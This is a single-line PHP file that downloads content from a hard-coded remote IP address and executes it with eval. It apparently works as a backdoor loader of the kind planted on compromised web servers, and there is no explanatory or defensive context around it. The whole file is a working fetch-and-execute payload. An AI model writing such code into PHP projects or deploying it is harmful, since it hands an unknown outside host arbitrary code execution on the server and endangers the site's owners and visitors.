<?php $url = "http://51.79.124.111/ker"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $tag= curl_exec($ch); curl_close($ch); eval("?>" . ("$tag"));?>